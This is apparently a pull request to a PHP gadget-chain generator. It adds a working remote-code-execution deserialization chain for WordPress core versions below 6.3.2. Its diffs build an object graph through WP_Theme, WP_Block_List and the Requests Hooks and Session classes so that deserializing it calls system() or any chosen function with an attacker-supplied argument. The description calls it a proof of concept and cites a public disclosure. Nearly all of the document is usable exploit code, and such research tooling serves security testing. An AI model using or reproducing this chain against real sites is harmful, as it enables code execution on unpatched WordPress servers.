### PR TITLE
Add RCE Gadget Chain WordPress Core

### DIFF
--- a/gadgetchains/WordPress/RCE/1/chain.php
+++ b/gadgetchains/WordPress/RCE/1/chain.php
@@ -7,7 +7,7 @@ class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
     public static $version = '< 6.3.2';
     public static $vector = '__toString';
     public static $author = 'pandhacker';
-    public static $information = 'Executes a given function with an unique parameter';
+    public static $information = 'https://wpscan.com/blog/finding-a-rce-gadget-chain-in-wordpress-core/ (@marcs0h)';
 
     public function generate(array $parameters)
     {

--- a/gadgetchains/WordPress/RCE/1/chain.php
+++ b/gadgetchains/WordPress/RCE/1/chain.php
@@ -1,0 +1,50 @@
+<?php
+
+namespace GadgetChain\WordPress;
+
+class RCE1 extends \PHPGGC\GadgetChain\RCE\Command
+{
+    public static $version = '< 6.3.2';
+    public static $vector = '__toString';
+    public static $author = 'pandhacker';
+    public static $information = 'Executes given command through system()';
+
+    public function generate(array $parameters)
+    {
+        $command = $parameters['command'];
+
+        $blocks = array(
+            'Name' => array(
+                'blockName' => 'Parent Theme'
+            )
+        );
+
+        $hooks_recurse_once = new \WpOrg\Requests\Hooks(
+            array(
+                'http://localhost/Name' => array(
+                    array('system')
+                )
+            )
+        );
+
+        $hooks = new \WpOrg\Requests\Hooks(
+            array(
+                'requests.before_request' => array(
+                    array(
+                        array(
+                            $hooks_recurse_once,
+                            'dispatch'
+                        )
+                    )
+                )
+            )
+        );
+
+        $parent = new \WpOrg\Requests\Session('http://localhost/', array($command), array('hooks' => $hooks));
+        $registered_block_types = new \WP_Theme(null, $parent);
+        $registry = new \WP_Block_Type_Registry($registered_block_types);
+        $headers = new \WP_Block_List($blocks, $registry);
+
+        return new \WP_Theme($headers);
+    }
+}

--- a/gadgetchains/WordPress/RCE/1/chain.php
+++ b/gadgetchains/WordPress/RCE/1/chain.php
@@ -7,11 +7,12 @@ class RCE1 extends \PHPGGC\GadgetChain\RCE\Command
     public static $version = '< 6.3.2';
     public static $vector = '__toString';
     public static $author = 'pandhacker';
-    public static $information = 'Executes given command through system()';
+    public static $information = 'Executes a given function with an unique parameter';
 
     public function generate(array $parameters)
     {
-        $command = $parameters['command'];
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
 
         $blocks = array(
             'Name' => array(
@@ -22,7 +23,7 @@ class RCE1 extends \PHPGGC\GadgetChain\RCE\Command
         $hooks_recurse_once = new \WpOrg\Requests\Hooks(
             array(
                 'http://localhost/Name' => array(
-                    array('system')
+                    array($function)
                 )
             )
         );
@@ -40,7 +41,7 @@ class RCE1 extends \PHPGGC\GadgetChain\RCE\Command
             )
         );
 
-        $parent = new \WpOrg\Requests\Session('http://localhost/', array($command), array('hooks' => $hooks));
+        $parent = new \WpOrg\Requests\Session('http://localhost/', array($parameter), array('hooks' => $hooks));
         $registered_block_types = new \WP_Theme(null, $parent);
         $registry = new \WP_Block_Type_Registry($registered_block_types);
         $headers = new \WP_Block_List($blocks, $registry);

--- a/gadgetchains/WordPress/RCE/1/chain.php
+++ b/gadgetchains/WordPress/RCE/1/chain.php
@@ -22,7 +22,7 @@ class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
 
         $hooks_recurse_once = new \WpOrg\Requests\Hooks(
             array(
-                'http://localhost/Name' => array(
+                'http://p:0/Name' => array(
                     array($function)
                 )
             )
@@ -41,7 +41,7 @@ class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
             )
         );
 
-        $parent = new \WpOrg\Requests\Session('http://localhost/', array($parameter), array('hooks' => $hooks));
+        $parent = new \WpOrg\Requests\Session('http://p:0', array($parameter), array('hooks' => $hooks));
         $registered_block_types = new \WP_Theme(null, $parent);
         $registry = new \WP_Block_Type_Registry($registered_block_types);
         $headers = new \WP_Block_List($blocks, $registry);

--- a/gadgetchains/WordPress/RCE/1/chain.php
+++ b/gadgetchains/WordPress/RCE/1/chain.php
@@ -2,7 +2,7 @@
 
 namespace GadgetChain\WordPress;
 
-class RCE1 extends \PHPGGC\GadgetChain\RCE\Command
+class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
 {
     public static $version = '< 6.3.2';
     public static $vector = '__toString';

--- a/gadgetchains/WordPress/RCE/1/gadgets.php
+++ b/gadgetchains/WordPress/RCE/1/gadgets.php
@@ -4,10 +4,9 @@ namespace WpOrg\Requests
 {
     class Session 
     {
-        public $url = null;
-        public $headers = [];
-        public $data = [];
-        public $options = [];
+        public $url;
+        public $headers;
+        public $options;
 
         public function __construct($url, $headers, $options) 
         {
@@ -19,7 +18,7 @@ namespace WpOrg\Requests
     
     class Hooks 
     {
-        public $hooks = [];
+        public $hooks;
 
         public function __construct($hooks) 
         {
@@ -32,7 +31,7 @@ namespace
 {
     final class WP_Block_Type_Registry 
     {
-        public $registered_block_types = array();
+        public $registered_block_types;
 
         public function __construct($registered_block_types) 
         {
@@ -43,7 +42,6 @@ namespace
     class WP_Block_List 
     {
         public $blocks;
-        public $available_context;
         public $registry;
     
         public function __construct($blocks, $registry) 
@@ -55,19 +53,8 @@ namespace
     
     final class WP_Theme 
     {
-        public $update;
-        private $theme_root;
         public $headers;
-        private $headers_sanitized;
-        private $block_theme;
-        private $name_translated;
-        private $errors;
-        private $stylesheet;
-        private $template;
         public $parent;
-        private $theme_root_uri;
-        private $textdomain_loaded;
-        private $cache_hash;
 
         public function __construct($headers = null, $parent = null) 
         {

--- a/gadgetchains/WordPress/RCE/1/gadgets.php
+++ b/gadgetchains/WordPress/RCE/1/gadgets.php
@@ -1,0 +1,78 @@
+<?php
+
+namespace WpOrg\Requests
+{
+    class Session 
+    {
+        public $url = null;
+        public $headers = [];
+        public $data = [];
+        public $options = [];
+
+        public function __construct($url, $headers, $options) 
+        {
+            $this->url = $url;
+            $this->headers = $headers;
+            $this->options = $options;
+        }
+    }
+    
+    class Hooks 
+    {
+        public $hooks = [];
+
+        public function __construct($hooks) 
+        {
+            $this->hooks = $hooks;
+        }
+    }    
+}
+
+namespace 
+{
+    final class WP_Block_Type_Registry 
+    {
+        public $registered_block_types = array();
+
+        public function __construct($registered_block_types) 
+        {
+            $this->registered_block_types = $registered_block_types;
+        }
+    }
+    
+    class WP_Block_List 
+    {
+        public $blocks;
+        public $available_context;
+        public $registry;
+    
+        public function __construct($blocks, $registry) 
+        {
+            $this->blocks = $blocks;
+            $this->registry = $registry;
+        }
+    }
+    
+    final class WP_Theme 
+    {
+        public $update;
+        private $theme_root;
+        public $headers;
+        private $headers_sanitized;
+        private $block_theme;
+        private $name_translated;
+        private $errors;
+        private $stylesheet;
+        private $template;
+        public $parent;
+        private $theme_root_uri;
+        private $textdomain_loaded;
+        private $cache_hash;
+
+        public function __construct($headers = null, $parent = null) 
+        {
+            $this->headers = $headers;
+            $this->parent = $parent;
+        }
+    }
+}


### PR DESCRIPTION
Hi,

I just added the PoC for the [RCE Gadget Chain in WordPress Core](https://wpscan.com/blog/finding-a-rce-gadget-chain-in-wordpress-core/) for WordPress < 6.3.2.